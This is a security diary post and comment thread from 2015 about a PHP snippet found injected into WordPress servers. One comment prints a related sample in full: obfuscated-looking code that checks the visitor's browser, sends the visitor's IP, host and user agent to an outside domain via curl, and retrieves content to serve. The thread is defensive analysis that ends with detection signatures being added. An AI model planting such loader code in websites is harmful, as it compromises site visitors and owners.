Thanks to one of our readers, for sending us this snipped of PHP he found on a Wordpress server (I added some line breaks and comments in red for readability):
# or try fopen as a last resort
# The data retrieved will be echoed back to the user if it starts with the string "scr".
I haven't been able to retrieve any content from errorcontent.com. Has anybody else seen this code, or is able to retrieve content from errorcontent.com ? According to whois, errorcontent.com is owned by a Chinese organization. It currently resolves to 37.1.207.26, which is owned by a british ISP. Any help as to the nature of this snippet will be appreciated. --- |
Johannes 4478 Posts ISC Handler May 26th 2015 |
Thread locked Subscribe |
May 26th 2015 6 years ago |
I found this very old pastie which also refers to errorcontent.com (Jan 2014):
pastebin.com/… Seems to be the same code... /x |
Xme 687 Posts ISC Handler |
Quote |
May 26th 2015 6 years ago |
The 6-character code is an identified of the variation of the malware. Here's another example. Same format, different host, 6-code, and variable name. Points back at the same IP though.
$ host styleheader.com styleheader.com has address 37.1.207.26 styleheader.com mail is handled by 10 mail.styleheader.com. #19f955# error_reporting(0); ini_set('display_errors',0); $wp_uzlk8990 = @$_SERVER['HTTP_USER_AGENT']; if (( preg_match ('/Gecko|MSIE/i', $wp_uzlk8990) && !preg_match ('/bot/i', $wp_uzlk8990))){ $wp_uzlk098990="http://"."style"."header".".com/header"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlenc ode($wp_uzlk8990); $ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_uzlk098990); curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_8990uzlk = curl_exec ($ch); curl_close($ch);} ... |
Maarten 1 Posts |
Quote |
May 27th 2015 6 years ago |
Added detection to phish.ndb:
Sanesecurity.Malware.25170.PhpBot Sanesecurity.Malware.25175.PhpBot Cheers for the samples, Steve Sanesecurity.com |
Sanesecurity 21 Posts |
Quote |
May 27th 2015 6 years ago |
Sign Up for Free or Log In to start participating in the conversation!